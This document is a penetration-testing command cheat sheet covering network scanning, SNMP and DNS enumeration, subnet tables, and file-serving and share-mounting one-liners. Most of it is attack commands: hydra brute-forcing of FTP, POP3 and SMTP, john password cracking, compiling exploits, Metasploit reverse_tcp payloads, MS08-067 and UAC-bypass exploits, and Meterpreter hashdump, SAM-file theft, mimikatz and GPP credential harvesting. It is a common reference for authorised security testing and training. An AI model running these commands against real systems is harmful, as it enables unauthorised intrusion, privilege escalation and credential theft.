nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
nmap -v -sS -A -T4 target
nmap -v -sS -p- -A -T4 target
nmap -v -sU -sS -p- -A -T4 target
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X
T4 scan: for TCP connect scans, T2 is more appropriate. T4 is better suited to testing on low-latency, high-bandwidth internal networks, but this also depends on the target devices; scanning them with T4/T5 can produce inaccurate results. In general, the slower the scan the better; you can also run a quick scan of 1000 targets first to get started, then scan the rest more slowly.
netdiscover -r 192.168.1.0/24
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
nmap -A performs enumeration of all the remote services listed below, so it is only mentioned here in passing.
https://127.0.0.1:9392
Log in to OpenVAS; the password is the one set during installation.
netcat -nvlp 443
Add socks4 127.0.0.1 1010 to /etc/proxychains.conf
Add socks4 127.0.0.1 1011 to /etc/proxychains.conf
128
64
255
255
0.0.0.0 - 127.255.255.255
128.0.0.0 - 191.255.255.255
192.0.0.0 - 223.255.255.255
224.0.0.0 - 239.255.255.255
240.0.0.0 - 255.255.255.255
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
127.0.0.0 - 127.255.255.255
255.255.255.254  1 Host
255.255.255.252  2 Hosts
255.255.255.248  6 Hosts
255.255.255.240  14 Hosts
255.255.255.224  30 Hosts
255.255.255.192  62 Hosts
255.255.255.128  126 Hosts
255.255.255.0  254 Hosts
255.255.254.0  510 Hosts
255.255.252.0  1022 Hosts
255.255.248.0  2046 Hosts
255.255.240.0  4094 Hosts
255.255.224.0  8190 Hosts
255.255.192.0  16382 Hosts
255.255.128.0  32766 Hosts
255.255.0.0  65534 Hosts
255.254.0.0  131070 Hosts
255.252.0.0  262142 Hosts
255.248.0.0  524286 Hosts
site:exploit-db.com exploit kernel <= 3
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:80
mount 192.168.1.1:/vol/share /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
If the password is not passed on the command line, it can be entered at the prompt instead, so the plaintext password is not stored in the bash history.
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
apt-get install smb4k -y
nikto -h 192.168.1.1
dirbuster
tcpdump tcp port 80 -w output.pcap -i eth0
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)
/usr/share/wordlists
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V
hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V
-t limits the number of concurrent connections, e.g. -t 15
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
john --format=descrypt hash --show
Determine the target platform from the header files the exploit #includes:
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h
gcc -o exploit exploit.c
gcc -m32 exploit.c -o exploit
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
su from reverse shells.
Special commands:
set payload windows/meterpreter/reverse_tcp
set payload windows/vncinject/reverse_tcp
set ViewOnly false
set payload linux/meterpreter/reverse_tcp
upload file c:\\windows
download c:\\windows\\repair\\sam /tmp
execute -f c:\\windows\\temp\\exploit.exe
execute -f cmd -c
ps
shell
getsystem
hashdump
portfwd add -l 3389 -p 3389 -r target
portfwd delete -l 3389 -p 3389 -r target
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/dcerpc/ms06_040_netapi
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/local/bypassuac
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login
use exploit/multi/script/web_delivery
post/windows/manage/powershell/exec_powershell
use exploit/multi/http/jboss_maindeployer
use exploit/windows/mssql/mssql_payload
run post/windows/gather/win_privs
use post/windows/gather/credentials/gpp
load mimikatz -> wdigest
run post/windows/gather/local_admin_search_enum
run post/windows/gather/smart_hashdump
\x00 \x08 \x09 \x0a \x0d \x1b \x20 \x21 \x22 \x23 \x24 \x25 \x26 \x27 \x28 \x29 \x2a \x2b \x2c
enable
conf t
(config)# interface fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
(config-if)# line vty 0 4
(config-line)# login
(config-line)# password YOUR-PASSWORD
# show running-config
# show startup-config
# show version
# show session
# show ip interface
# show interface e0
# show ip route
# show access-lists
# dir file systems
# dir all-filesystems
# dir /all
# terminal length 0
16 Bytes, 20 Bytes, 32 Bytes, 64 Bytes